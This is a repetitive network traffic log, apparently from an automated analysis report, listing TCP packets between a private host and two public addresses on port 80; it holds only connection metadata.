              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
